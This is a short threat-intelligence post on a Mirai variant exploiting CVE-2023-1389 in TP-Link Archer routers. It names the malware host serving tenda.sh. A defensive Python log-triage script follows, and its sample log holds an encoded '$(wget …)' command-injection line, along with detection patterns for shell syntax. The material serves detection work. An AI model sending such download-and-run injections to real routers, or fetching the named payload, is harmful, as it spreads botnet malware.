
Mirai Variant CVE-2023-1389

Mirai variant leveraging CVE-2023-1389

Introduction

On Feb 18 2024, our systems logged activity from an endpoint on the internet trying to hit the path /cgi-bin/luci. Initial research on the internet quickly gave hints that this was an attempt to exploit CVE-2023-1389, an unauthenticated remote code execution vulnerability on TP-Link Archer routers.

The payload triggers, on the victim router, the download of a script: http://45.142.214.108/tenda.sh

The script tenda.sh tries to fetch a variety of static binaries, compiled for various architectures, before trying to run them with the argument tplink.
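For defenders who want to check their own web or reverse-proxy logs for the same kind of probe, the following is an added example and not code from the original post. It flags requests to /cgi-bin/luci whose decoded query string contains shell syntax and extracts any embedded download URL. The log lines, the parameter name `x` and the addresses in them are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Combined-log-format prefix: client, ident, user, [time], "METHOD target HTTP/x"
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Shell syntax that should never appear in a decoded LuCI query string.
SHELL_META_RE = re.compile(r'\$\(|`|\||;')
# URLs carried inside the query, i.e. candidate second-stage download locations.
EMBEDDED_URL_RE = re.compile(r'https?://[^\s\'"`()|;&]+')

# Constructed sample lines (documentation address ranges, hypothetical parameter "x").
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Feb/2024:10:00:00 +0000] "GET /cgi-bin/luci?x=%24%28wget+http%3A%2F%2F198.51.100.7%2Fexample.sh%29 HTTP/1.1" 404 162',
    '192.0.2.20 - - [18/Feb/2024:10:01:00 +0000] "GET /cgi-bin/luci/;stok=abc123/admin/status?status=1 HTTP/1.1" 200 512',
    '192.0.2.30 - - [18/Feb/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

def triage(line):
    """Return a finding dict for a suspicious /cgi-bin/luci request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    if not parts.path.startswith("/cgi-bin/luci"):
        return None
    # Inspect only the query: LuCI paths legitimately contain ';' (";stok=...").
    query = unquote_plus(parts.query)
    if not SHELL_META_RE.search(query):
        return None
    return {
        "src": m["src"],
        "method": m["method"],
        "path": parts.path,
        "decoded_query": query,
        "embedded_urls": EMBEDDED_URL_RE.findall(query),
    }

def scan(lines):
    """Triage every line and keep only the findings."""
    return [f for f in map(triage, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs usually omit request bodies, so a POST-borne payload needs a body-logging proxy or packet capture to be seen this way.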